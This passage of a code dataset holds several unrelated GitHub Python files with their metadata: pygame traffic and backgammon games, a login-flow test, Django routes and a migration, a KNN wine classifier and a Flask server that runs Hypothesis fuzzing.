100), (23, 110), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 120), (23, 190), 3)\n\n pygame.draw.line(roadFromTop, 'gold', (73, 0), (73, 10), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 20), (73, 30), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 40), (73, 50), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 60), (73, 70), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 80), (73, 90), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 100), (73, 110), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 120), (73, 130), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 140), (73, 150), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 160), (73, 170), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 180), (73, 190), 1)\n\n # lower road\n pygame.draw.line(roadFromTop, 'gold', (50, 300), (50, 500), 4)\n\n pygame.draw.line(roadFromTop, 'gold', (23, 300), (23, 310), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 320), (23, 330), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 340), (23, 350), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 360), (23, 370), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 380), (23, 390), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 400), (23, 410), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 420), (23, 430), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 440), (23, 450), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 460), (23, 470), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 480), (23, 490), 1)\n pygame.draw.line(roadFromTop, 'gold', (23, 497), (23, 500), 1)\n\n pygame.draw.line(roadFromTop, 'gold', (73, 310), (73, 380), 3)\n pygame.draw.line(roadFromTop, 'gold', (73, 390), (73, 400), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 410), (73, 420), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 430), (73, 440), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 450), (73, 460), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 470), (73, 480), 1)\n pygame.draw.line(roadFromTop, 'gold', (73, 490), (73, 500), 1)\n else:\n screen.fill((4, 159, 65))\n start_time = 0\n light_on = 0\n car_rect.x = 0\n car_rect1.x = 0\n car_rect2.x = 990\n car_rect3.x = 990\n car_rect4.y = 10\n car_rect5.y = 490\n score_message_again = game_font.render(\n f'Press SPACE to 
start again', False, (65, 65, 65))\n score_message_again_rect = score_message_again.get_rect(\n center=(480, 260))\n score_message = game_font.render(\n f'Your score: {score}', False, (65, 65, 65))\n score_message_rect = score_message.get_rect(center=(480, 180))\n high_score_surface = game_font.render(\n f'High score: {high_score}', False, (255, 255, 255))\n high_score_rect = high_score_surface.get_rect(center=(480, 340))\n\n if score == 0:\n screen.blit(game_name, game_name_rect)\n screen.blit(game_message, game_message_rect)\n else:\n screen.blit(score_message_again, score_message_again_rect)\n screen.blit(score_message, score_message_rect)\n screen.blit(high_score_surface, high_score_rect)\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"Andrija121/IndividualProject","sub_path":"IndividualProject.py","file_name":"IndividualProject.py","file_ext":"py","file_size_in_byte":25048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19791399959","text":"from . import login, login_person\nfrom ..factories import PersonFactory\nfrom http import HTTPStatus\nimport urllib\n\n\nclass TestLoginFlow:\n def test_redirect_on_login(self, testapp, db, person, carpool):\n cancel_carpool_url = '/carpools/{}/cancel'.format(carpool.uuid)\n res = testapp.get(cancel_carpool_url)\n res = res.follow()\n res = login_person(testapp, person, follow=False)\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == cancel_carpool_url\n\n def test_dupe_email_login(self, testapp, db, person, carpool):\n # Steve logs in once using his Facebook account\n res = login(testapp, 'steve@facebook', 'stevejobs', 'steve@example.com')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/profile'\n\n # ... then logs out\n res = testapp.post('/logout')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/'\n\n # Steve tries to login again, this time using Google\n res = login(testapp, 'steve@google', 'stevejobs', 'steve@example.com')\n assert res.status_code == HTTPStatus.FOUND\n url = urllib.parse.urlparse(res.headers['Location'])\n assert url.path == '/login'\n","repo_name":"RagtagOpen/nomad","sub_path":"tests/functional/test_login_flow.py","file_name":"test_login_flow.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"12931359205","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^new/$', views.idea_new, name='idea_new'),\n    url(r'^$', views.idea_list, name=\"idea_list\"),\n    url(r'^(?P<pk>\\d+)/$', views.idea_detail, name='idea_detail'),\n    url(r'^(?P<pk>\\d+)/edit/$', views.idea_edit, name='idea_edit'),\n    url(r'^(?P<pk>\\d+)/del/$', views.idea_del, name='idea_del'),\n    url(r'^(?P<pk>\\d+)/comment/(?P<comment_pk>\\d+)/edit/$', views.comment_edit, name='comment_edit'),\n    url(r'^(?P<pk>\\d+)/comment/(?P<comment_pk>\\d+)/del/$', views.comment_del, name='comment_del'),\n    #Sample\n    url(r'^location/$', views.location, name=\"location\")\n]\n","repo_name":"sarkmen/hackerthon","sub_path":"idea/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17220639453","text":"from __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('projects', '0087_resource_deleted'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='resource',\n            options={'ordering': ['name', 'type', 'location', 'description'], 'permissions': (('view_resource', 'Can view a resource of a project'), ('trash_resource', 'Can trash a resource'), ('restore_resource', 'Can restore a resource'), ('change_project_resource', 'Can change the project of a resource'), ('add_resource_without_project', 'Can add a resource without a project')), 'verbose_name': 'Resource', 'verbose_name_plural': 'Resources'},\n        ),\n    ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/projects/migrations/0088_resources_meta_changes.py","file_name":"0088_resources_meta_changes.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"6629687263","text":"import pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.preprocessing import scale\r\nfrom typing import Tuple\r\n\r\nimport sys\r\nsys.path.append(\"..\")\r\ncolumns = [\r\n    \"Class\",\r\n    \"Alcohol\",\r\n    \"Malic acid\",\r\n    \"Ash\",\r\n    \"Alcalinity of ash\",\r\n    \"Magnesium\",\r\n    \"Total phenols\",\r\n    \"Flavanoids\",\r\n    \"Nonflavanoid phenols\",\r\n    \"Proanthocyanins\",\r\n    \"Color intensity\",\r\n    \"Hue\",\r\n    \"OD280/OD315 of diluted wines\",\r\n    \"Proline\",\r\n]\r\n\r\ndf = pd.read_csv(\"wine.data\", index_col=False, names=columns)\r\ndf.head()\r\n\r\n\r\n''' X - the wine features\r\n    y - its class\r\n'''\r\nX = df.loc[:, df.columns != \"Class\"]\r\ny = df[\"Class\"]\r\n\r\n'''\r\n    five-fold cross-validation\r\n'''\r\ncv = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n'''\r\n    cross-validation accuracy for K = [1, 50]\r\n'''\r\ndef get_best_score(X: pd.DataFrame, y: pd.Series, cv) -> Tuple[float, int]:\r\n    best_score, best_k = None, None\r\n\r\n    for k in range(1, 51):\r\n        model = KNeighborsClassifier(n_neighbors=k)\r\n        score = cross_val_score(model, X, y, cv=cv, scoring=\"accuracy\").mean()\r\n        \r\n        if best_score is None or score > best_score:\r\n            best_score, best_k = score, k\r\n        \r\n    return best_score, best_k\r\n\r\n\r\nscore, k = get_best_score(X, y, cv)\r\nprint(1, str(k))\r\nprint(2, f\"{score:.2f}\")\r\n\r\n'''\r\n    feature scaling\r\n'''\r\nscore, k = get_best_score(scale(X), y, cv)\r\n\r\n\r\nprint(3, str(k))\r\nprint(4, 
f\"{score:.2f}\")","repo_name":"RomanStoronskiy/AI_lab","sub_path":"3/statement-neighbours.py","file_name":"statement-neighbours.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22339521291","text":"import json\nimport logging\nimport logging.handlers\nimport os\nimport sys\nimport yaml\n\nfrom .errors import ConfigMissingOptionException\nfrom .fuzzing import RepoFuzzer\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom flask import Flask, request, send_from_directory, jsonify\nfrom sys import platform\nfrom datetime import datetime\n\nlogging.basicConfig(datefmt='%d-%b-%y %H:%M:%S',\n filename='fuzz_server.log',\n format='%(asctime)s: %(name)s: %(levelname)s: %(message)s')\n\nif platform.startswith('linux'):\n sysLogHandler = logging.handlers.SysLogHandler(address='/dev/log')\n sysLogHandler.setLevel(logging.DEBUG)\n logging.getLogger(__name__).addHandler(sysLogHandler)\n\nstreamHandler = logging.StreamHandler(sys.stdout)\nstreamHandler.setLevel(logging.INFO)\nlogging.getLogger(__name__).addHandler(streamHandler)\n\nlogger = logging.getLogger(__name__)\n\n\nclass FuzzServer:\n\n def __init__(self, config_path='config.yml'):\n\n logger.debug('Initialising fuzzing server.')\n\n self.app = Flask(__name__, static_url_path='/build')\n CORS(self.app)\n self.app.config['SQLALCHEMY_DATABASE_URI'] = \\\n os.environ.get('DATABASE_URL', 'sqlite:///data.db')\n self.app.config['SQLALCHEMY_TRACK_MODIFICATION'] = False\n\n self._load_config(config_path)\n self._init_fuzzers()\n self.db = SQLAlchemy(self.app)\n self._start_time = datetime.now()\n\n logger.info('Fuzzing server initialised.')\n\n def run(self, **kwargs):\n\n logger.info('Fuzzing server started running.')\n\n self.db.create_all()\n self._setup_routes()\n\n for (name, owner), fuzzer in self.fuzzers.items():\n\n if \"fuzz_on_start\" in fuzzer.config:\n if fuzzer.config[\"fuzz_on_start\"]:\n fuzzer.start()\n else:\n fuzzer.start()\n\n self.app.run(**kwargs)\n\n logger.debug('Fuzzing server stopped running.')\n\n def _setup_routes(self):\n\n logger.info('Setting up routes.')\n\n @self.app.route('/all_info', methods=['GET'])\n def get_data():\n repositories = []\n\n for (name, owner), fuzzer in self.fuzzers.items():\n data = fuzzer.get_errors()\n repositories.append(data)\n\n return jsonify({\n \"start_time\": self._start_time,\n \"uptime\": str(datetime.now() - self._start_time),\n \"repositories\": repositories\n })\n\n @self.app.route('/webhook', methods=['POST'])\n def on_git_push():\n data = json.loads(request.data)\n name = data['repository']['name']\n owner = data['repository']['owner']['name']\n\n try:\n fuzzer = self.fuzzers[(name, owner)]\n logger.debug('Git push for repository %s occurred.',\n fuzzer.name)\n\n return fuzzer.on_webhook(data)\n except KeyError:\n logger.error('Server not configured to fuzz this repository.')\n err_message = ('Hypothesis server has not been configured to '\n 'fuzz this repository.')\n\n return err_message, 404\n\n @self.app.route('/', methods=['GET'])\n def home():\n return send_from_directory('build', 'index.html')\n\n @self.app.route('/', methods=['GET'])\n def serve_static(path):\n return send_from_directory('build', path)\n\n @self.app.route('/get_errors', methods=['POST'])\n def get_errors():\n data = json.loads(request.data)\n name = data['name']\n owner = data['owner']\n try:\n fuzzer = self.fuzzers[(name, owner)]\n\n return jsonify(fuzzer.get_errors())\n except 
KeyError:\n                logger.error('Server not configured to fuzz this repository.')\n                err_message = ('Hypothesis server has not been configured to '\n                               'fuzz this repository.')\n\n                return err_message, 404\n\n        logger.debug('Routes set up.')\n\n    def _load_config(self, config_path):\n\n        logger.debug('Loading server configurations.')\n\n        try:\n            with open(config_path) as file:\n                logger.info('Opening file config_path.')\n                self.config = yaml.safe_load(file)\n\n                if 'repos' not in self.config:\n                    logger.error('Configuration file missing repos.')\n                    raise ConfigMissingOptionException('Configuration file ' +\n                                                      'missing a repos ' +\n                                                      'attribute.')\n            logger.info('File config_path loaded.')\n        except FileNotFoundError:\n            logger.error('File config.yml not found.')\n            raise FileNotFoundError('config.yml file not found. ' +\n                                    'Create one or specify config path.')\n\n        logger.info('Server configurations loaded.')\n\n    def _init_fuzzers(self):\n\n        logger.debug('Initialising fuzzers.')\n\n        self.fuzzers = {}\n\n        for repo, repo_config in self.config['repos'].items():\n            repo_name = repo_config['name']\n            repo_owner = repo_config['owner']\n\n            self.fuzzers[(repo_name, repo_owner)] = RepoFuzzer(repo_name,\n                                                               repo_config)\n\n        logger.info('Fuzzers initialised.')\n","repo_name":"hypothesis-imperial/hypothesis-server","sub_path":"hypothesisfuzzer/fuzz_server.py","file_name":"fuzz_server.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12582226719","text":"import pygame\nimport random\nimport os\nimport speech_recognition as sr\n\n\ndef create_speech_dice():\n    \"\"\"\n    Uses voice recognition to write two numbers in the file dice.txt\n    \"\"\"\n    recognizer = sr.Recognizer()\n    microphone = sr.Microphone()\n    values = \"\"\n    with microphone as source:\n        recognizer.adjust_for_ambient_noise(source)\n        audio = recognizer.listen(source)\n    try:\n        values = recognizer.recognize_google(audio, language=\"ro-Ro\")\n    except Exception:\n        pass\n    print(values)\n    first_num = second_num = 0\n    for i in range(0, len(values) - 1):\n        if '1' <= values[i] <= '6' and '1' <= values[i + 1] <= '6':\n            first_num = int(values[i])\n            second_num = int(values[i + 1])\n    if first_num != 0 and second_num != 0:\n        result = str(first_num) + \" \" + str(second_num)\n        f = open(\"../Dice.txt\", \"w\")\n        f.write(result)\n        f.close()\n    print(first_num, second_num)\n\n\ndef initialize():\n    \"\"\"\n    Initializes PyGame and the window\n    :return:\n    \"\"\"\n    os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (150, 30)\n    pygame.init()\n    pygame.display.set_caption('Backgammon')\n\n\ndef play_game():\n    \"\"\"\n    Long-ass function to play the whole game.\n    :return:\n    \"\"\"\n    # sound\n    sound_dice = pygame.mixer.Sound(\"../Sounds/Dice-Sound.wav\")\n    sound_piece = pygame.mixer.Sound(\"../Sounds/Piece-Move.wav\")\n\n    # screen\n    size = (800, 800)\n    screen = pygame.display.set_mode(size)\n    background = pygame.image.load(\"../Images/Board.png\")\n\n    # buttons\n    button_roll = pygame.image.load(\"../Images/Button-Roll.png\")\n    # button_roll = pygame.transform.scale(button_roll, (100, 100))\n    button_undo = pygame.image.load(\"../Images/Button-Undo.png\")\n    button_done = pygame.image.load(\"../Images/Button-Done.png\")\n\n    # game data\n    table = default_table()\n    # Table has w or b for pieces from 0 to 23,\n    # and the number of out pieces on 24(b) and 25(w)\n    playing = True\n    black_pips = 167\n    white_pips = 167\n\n    # moved_dice = 0\n    # dice_capacity = 2\n    # dices1 = dices2 = 1\n\n    dices_thrown = False\n    
dice_values = [[0, False, False], [0, False, False], [0, False, False], [0, False, False]]\n dice_position = 0\n # dice_values pattern: [[Value, Not Used Yet, Available]]\n\n stage = ['roll', 'piece moved', 'all pieces', 'start roll', 'nothing']\n turn = ['white', 'black']\n current_turn = 0\n current_stage = 3\n\n undo_stack = []\n dice_undo_stack = []\n position_undo_stack = []\n\n can_speech = False\n\n # text\n pygame.font.init()\n pipfont = pygame.font.SysFont('Times New Roman', 50)\n turn_font = pygame.font.SysFont('Times New Roman', 15)\n\n while playing:\n # pygame.mouse.set_cursor(*pygame.cursors.diamond)\n mouse = pygame.mouse.get_pos()\n # click = pygame.mouse.get_pressed(3)\n\n # text\n blacksurface = pipfont.render(str(black_pips), True, (0, 0, 0))\n whitesurface = pipfont.render(str(white_pips), True, (0, 0, 0))\n who_turns = turn_font.render(turn[current_turn], True, (0, 0, 0))\n\n # blit\n screen.blit(background, (0, 0))\n screen.blit(whitesurface, (362, -7))\n screen.blit(blacksurface, (362, 752))\n if current_stage != 3:\n screen.blit(who_turns, (40, 21))\n put_pieces(screen, table)\n if dices_thrown:\n put_dice(screen, dice_values, dice_position)\n\n if stage[current_stage] == 'roll' or stage[current_stage] == 'start roll':\n screen.blit(button_roll, (541, 353))\n if stage[current_stage] == 'piece moved':\n screen.blit(button_undo, (541, 353))\n if stage[current_stage] == 'all pieces':\n screen.blit(button_undo, (471, 353))\n screen.blit(button_done, (611, 353))\n\n if can_speech is True and current_stage == 0:\n # create_speech_dice()\n can_speech = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n\n if event.type == pygame.MOUSEBUTTONUP:\n # print(mouse[0], mouse[1])\n # print(click)\n pos_x = mouse[0]\n pos_y = mouse[1]\n # Roll\n if current_stage == 0 or current_stage == 3:\n # Roll Button\n if 368 <= pos_y <= 438 and 541 <= pos_x <= 700:\n if current_stage == 0 and pos_x > 640:\n create_speech_dice()\n [dices1, dices2] = get_dice()\n if current_stage == 3:\n while dices1 == dices2:\n [dices1, dices2] = get_dice()\n dice_undo_stack = []\n position_undo_stack = []\n if dices1 < dices2:\n dices1, dices2 = dices2, dices1\n if current_stage == 3:\n current_turn = 1\n dice_values[0][0] = dices1\n dice_values[0][1] = True\n dice_values[0][2] = check_available(table, dices1, turn[current_turn])\n dice_values[1][0] = dices2\n dice_values[1][1] = True\n dice_values[1][2] = check_available(table, dices2, turn[current_turn])\n if dices1 == dices2:\n dice_values[2] = [0, False, False]\n dice_values[3] = [0, False, False]\n dice_values[2][0] = dice_values[3][0] = dices1\n\n dice_values[2][1] = True\n dice_values[2][2] = check_available(table, dices1, turn[current_turn])\n dice_values[3][1] = True\n dice_values[3][2] = check_available(table, dices1, turn[current_turn])\n else:\n dice_values[2] = [0, False, False]\n dice_values[3] = [0, False, False]\n dices_thrown = True\n dice_position = 0\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n # print(dice_values)\n pygame.mixer.Sound.play(sound_dice)\n clear_file()\n play_sound(dices1, dices2)\n current_stage = 4\n if can_turn(dice_values) is False:\n current_stage = 2\n\n if current_stage == 4 or current_stage == 1:\n # Move pieces\n click_on_piece = False\n if 40 <= pos_x <= 760 and 40 <= pos_y <= 356:\n click_on_piece = True\n if 40 <= pos_x <= 760 and 450 <= pos_y <= 760:\n 
click_on_piece = True\n if 40 <= pos_x <= 380 and 356 <= pos_y <= 450:\n dice_position = get_next_position(dice_values, dice_position)\n\n if click_on_piece:\n row = pos_x - 40\n row = row // 56\n if 450 <= pos_y <= 760:\n row += 12\n if 40 <= pos_y <= 356:\n row = 11 - row\n if row == 5:\n row = -1\n elif row < 5:\n row += 1\n if row == 18:\n row = -1\n elif row > 18:\n row -= 1\n if can_turn(dice_values):\n undo_stack.append(full_copy(table))\n dice_undo_stack.append(full_dice_copy(dice_values))\n position_undo_stack.append(dice_position)\n if row != -1:\n usable = True\n if dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n usable = False\n if usable and perform_move(table, turn[current_turn], row, dice_values[dice_position][0]):\n dice_values[dice_position][1] = False\n dice_position = get_next_position(dice_values, dice_position)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n position_undo_stack[-1] = dice_position\n if can_turn(dice_values):\n current_stage = 1\n else:\n current_stage = 2\n else:\n undo_stack.pop(-1)\n dice_undo_stack.pop(-1)\n position_undo_stack.pop(-1)\n else:\n # if perform_move(table, turn[current_turn], row, dices1):\n usable = True\n if dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n usable = False\n if usable and discard_out_piece(table, turn[current_turn], dice_values[dice_position][0]):\n dice_values[dice_position][1] = False\n dice_position = get_next_position(dice_values, dice_position)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if dice_values[dice_position][2] is False or dice_values[dice_position][1] is False:\n dice_position = get_next_position(dice_values, dice_position)\n position_undo_stack[-1] = dice_position\n if can_turn(dice_values):\n current_stage = 1\n else:\n current_stage = 2\n else:\n undo_stack.pop(-1)\n dice_undo_stack.pop(-1)\n position_undo_stack.pop(-1)\n [white_pips, black_pips] = compute_pips(table)\n if current_stage == 1:\n # Undo Button\n if 368 <= pos_y <= 438 and 541 <= pos_x <= 640:\n if len(undo_stack) > 0:\n table = undo_stack.pop(-1)\n pygame.mixer.Sound.play(sound_piece)\n dice_values = dice_undo_stack.pop(-1)\n dice_position = position_undo_stack.pop(-1)\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if len(undo_stack) == 0:\n current_stage = 4\n [white_pips, black_pips] = compute_pips(table)\n if current_stage == 2:\n # Undo Shifted Left\n if 368 <= pos_y <= 438 and 470 <= pos_x <= 570:\n if len(undo_stack) > 0:\n table = undo_stack.pop(-1)\n pygame.mixer.Sound.play(sound_piece)\n dice_values = dice_undo_stack.pop(-1)\n dice_position = position_undo_stack.pop(-1)\n current_stage = 1\n for i in range(0, 4):\n if dice_values[i][0] != 0:\n dice_values[0][2] = check_available(table, dice_values[0][1], turn[current_turn])\n if 368 <= pos_y <= 438 and 610 <= pos_x <= 710:\n dices_thrown = False\n if current_turn == 0:\n current_turn = 1\n elif current_turn == 1:\n current_turn = 0\n current_stage = 0\n undo_stack = []\n dice_undo_stack = []\n position_undo_stack = []\n can_speech = True\n [white_pips, black_pips] = 
compute_pips(table)\n\n # screen.blit(pygame.transform.rotate(screen, 180), (0, 0))\n\n pygame.display.update()\n\n\ndef can_turn(dice_table):\n \"\"\"\n Looks at all the dice and returns True if there is any available dice\n \"\"\"\n to_return = False\n # print(dice_table)\n for i in range(0, 4):\n if dice_table[i][0] != 0:\n if dice_table[i][2]:\n if dice_table[i][1]:\n to_return = True\n return to_return\n\n\ndef get_next_position(dice_table, position):\n \"\"\"\n Iterates through the dice that were cast\n :return: new position (from 0 to 4)\n \"\"\"\n # print(dice_table, position)\n dice_values = dice_table\n dice_position = position\n dice_position += 1\n if dice_values[3][0] == 0 and dice_position == 2:\n dice_position = 0\n if dice_values[3][0] != 0 and dice_position == 4:\n dice_position = 0\n while dice_values[dice_position][1] is False or dice_values[dice_position][2] is False:\n dice_position += 1\n if dice_values[3][0] == 0 and dice_position == 2:\n dice_position = 0\n if dice_values[3][0] != 0 and dice_position == 4:\n dice_position = 0\n if dice_position == position:\n return position\n\n return dice_position\n\n\ndef full_copy(table):\n \"\"\"\n Returns a deep copy of the given table, made for undo\n \"\"\"\n to_ret = []\n for i in range(0, 24):\n to_ret.append([])\n for j in table[i]:\n to_ret[i].append(j)\n to_ret.append(table[24])\n to_ret.append(table[25])\n return to_ret\n\n\ndef full_dice_copy(table):\n \"\"\"\n Deepcopy of the dice values\n \"\"\"\n to_ret = [[0, False, False], [0, False, False], [0, False, False], [0, False, False]]\n for i in range(0, 4):\n to_ret[i][0] = table[i][0]\n to_ret[i][1] = table[i][1]\n to_ret[i][2] = table[i][2]\n return to_ret\n\n\ndef default_table():\n \"\"\"\n Initializes the default table\n :return: List\n \"\"\"\n to_return = []\n for i in range(0, 24):\n to_return.append([])\n b = 'b'\n w = 'w'\n to_return[0] = [b, b]\n to_return[5] = [w, w, w, w, w]\n to_return[7] = [w, w, w]\n to_return[11] = [b, b, b, b, b, b, b, b]\n to_return[12] = [w, w, w, w, w]\n to_return[16] = [b, b, b]\n to_return[18] = [b, b, b, b, b]\n to_return[23] = [w, w]\n to_return.append(0) # Number of out black-pieces\n to_return.append(0) # Number of out white-pieces\n # game_sample(to_return)\n return to_return\n\n\ndef compute_pips(table):\n \"\"\"\n Computes the number of remaining moves each player has to make\n :return: a table containing the values for white and black\n \"\"\"\n white_pips = 0\n black_pips = 0\n for i in range(0, 24):\n for j in table[i]:\n if j == 'w':\n white_pips += (i + 1)\n if j == 'b':\n black_pips += (24 - i)\n white_pips += table[25] * 25\n black_pips += table[24] * 25\n return [white_pips, black_pips]\n\n\ndef game_sample(table):\n \"\"\"\n Sample game for debugging purposes\n \"\"\"\n to_return = table\n perform_move(to_return, 'black', 16, 1)\n perform_move(to_return, 'white', 23, 6)\n discard_out_piece(to_return, 'black', 4)\n perform_move(to_return, 'white', 23, 4)\n perform_move(to_return, 'black', 16, 1)\n perform_move(to_return, 'black', 18, 1)\n # return\n discard_out_piece(to_return, 'white', 4)\n discard_out_piece(to_return, 'white', 5)\n discard_out_piece(to_return, 'black', 4)\n\n\ndef check_available(table, dice, colour):\n \"\"\"\n Checks if the value from dice can be used on the table\n :return: True/ False\n \"\"\"\n if dice > 6:\n return False\n if colour == 'black':\n colour = 'b'\n if colour == 'white':\n colour = 'w'\n\n # First checks for out pieces\n if colour == 'w':\n if table[25] > 0:\n if 
check_moves(table, colour)[24 - dice]:\n return True\n else:\n return False\n if colour == 'b':\n if table[24] > 0:\n if check_moves(table, colour)[dice - 1]:\n return True\n else:\n return False\n\n # Check for the rest\n available = False\n if colour == 'b':\n for i in range(0, 23 - dice):\n if check_moves(table, colour)[i + dice]:\n available = True\n if colour == 'w':\n for i in range(23, dice + 1, -1):\n if check_moves(table, colour)[i - dice]:\n available = True\n return available\n\n\ndef check_moves(table, colour):\n \"\"\"\n Checks the possible moves for the given colour (black/white)\n :return: List of booleans\n \"\"\"\n to_ret = []\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n for i in range(0, 24):\n to_ret.append(False)\n for i in range(0, 24):\n if len(table[i]) == 0:\n to_ret[i] = True\n if len(table[i]) == 1 and table[i][0] != colour:\n to_ret[i] = True\n if len(table[i]) > 0 and table[i][0] == colour:\n to_ret[i] = True\n return to_ret\n\n\ndef perform_move(table, colour, row, value):\n \"\"\"\n Performs a valid move\n :return: True if move was performed, False otherwise\n \"\"\"\n if row < -1 or row > 23:\n print('Move not available!')\n return False\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n if colour == 'b':\n new_position = row + value\n else:\n new_position = row - value\n if colour == 'w' and table[25] > 0 and row != -1:\n print('Move not available!')\n return False\n if colour == 'b' and table[24] > 0 and row != -1:\n print('Move not available!')\n return False\n performable = True\n if row == -1:\n new_position = value\n else:\n if row != -1:\n if len(table[row]) == 0 or table[row][0] != colour:\n print('Move not available!')\n return False\n else:\n if colour == 'b' and table[24] == 0:\n print('Move not available!')\n return False\n if colour == 'w' and table[25] == 0:\n print('Move not available!')\n return False\n if new_position > 23 or new_position < 0:\n print('Move not available!')\n return False\n if check_moves(table, colour)[new_position] is False:\n performable = False\n if performable:\n sound_piece = pygame.mixer.Sound(\"../Sounds/Piece-Move.wav\")\n sound_oo = pygame.mixer.Sound(\"../Sounds/Sunet-Oo.wav\")\n pygame.mixer.Sound.play(sound_piece)\n if row != -1:\n table[row].pop(-1)\n if len(table[new_position]) == 0:\n table[new_position] = [colour]\n else:\n if table[new_position][0] != colour:\n table[new_position] = [colour]\n if colour == 'w':\n # If colour is white, it means that the other piece is black\n # print(\"Out Black Piece!\")\n pygame.mixer.Sound.play(sound_oo)\n table[24] += 1\n if colour == 'b':\n table[25] += 1\n # print(\"Out White Piece!\")\n pygame.mixer.Sound.play(sound_oo)\n else:\n table[new_position].append(colour)\n return True\n else:\n print('Move not available!')\n return False\n\n\ndef discard_out_piece(table, colour, value):\n \"\"\"\n Puts a piece back on the table after it was taken out\n \"\"\"\n if colour == 'black':\n colour = 'b'\n elif colour == 'white':\n colour = 'w'\n\n if colour == 'b':\n if table[24] < 1:\n print('Move not available!')\n return False\n if check_moves(table, colour)[value - 1] is True:\n if perform_move(table, colour, -1, value - 1):\n table[24] -= 1\n return True\n else:\n print('Move not available!')\n return False\n if colour == 'w':\n if table[25] < 1:\n print('Move not available!')\n return False\n if check_moves(table, colour)[24 - value] is True:\n if perform_move(table, colour, -1, 24 - value):\n table[25] -= 
1\n return True\n else:\n print('Move not available!')\n return False\n\n\ndef put_pieces(screen, table):\n \"\"\"\n Blits the pieces to the screen\n \"\"\"\n white_piece = pygame.image.load(\"../Images/Piece-White.png\")\n black_piece = pygame.image.load(\"../Images/Piece-Black.png\")\n for i in range(0, 24):\n for j in range(0, len(table[i])):\n if table[i][j] == 'w':\n screen.blit(white_piece, get_piece_position(i, j))\n if table[i][j] == 'b':\n screen.blit(black_piece, get_piece_position(i, j))\n for i in range(0, table[24]):\n black_piece = pygame.transform.scale(black_piece, (50, 50))\n screen.blit(black_piece, get_piece_position(-1, i)) # -1 for black pieces\n for i in range(0, table[25]):\n white_piece = pygame.transform.scale(white_piece, (50, 50))\n screen.blit(white_piece, get_piece_position(-2, i)) # -2 for white pieces\n\n\ndef get_dice():\n \"\"\"\n Checks if there is a value in the file. If there is not, generates a random one.\n If there are 2 values in the file, then it takes the values.\n :return:\n \"\"\"\n f = open(\"../Dice.txt\")\n value1 = 1\n value2 = 1\n line = str(f.readline())\n try:\n x = int(line[0])\n if 1 <= x <= 6:\n value1 = x\n x = int(line[2])\n if 1 <= x <= 6:\n value2 = x\n except (Exception,):\n value1 = random.randint(1, 6)\n value2 = random.randint(1, 6)\n\n f.close()\n return [value1, value2]\n\n\ndef put_dice(screen, dice_table, current_dice):\n \"\"\"\n 